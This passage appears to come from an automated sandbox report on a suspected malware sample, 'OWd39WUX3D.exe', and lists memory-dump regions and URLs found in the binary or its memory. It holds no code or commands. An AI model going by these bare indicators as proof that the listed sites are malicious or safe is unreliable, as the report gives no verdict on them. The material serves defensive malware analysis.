00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg3.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg4.png
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winhui.cn/template/default/img/fixedimg6.png
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/11.3
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/Z
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yumgiskor.kz/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601023939.0000000004010000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.css
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chimpstatic.com/mcjs-connected/js/users/4c8ec8296850930fd1c281270/48b88329c63ed7575f5b4b054.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 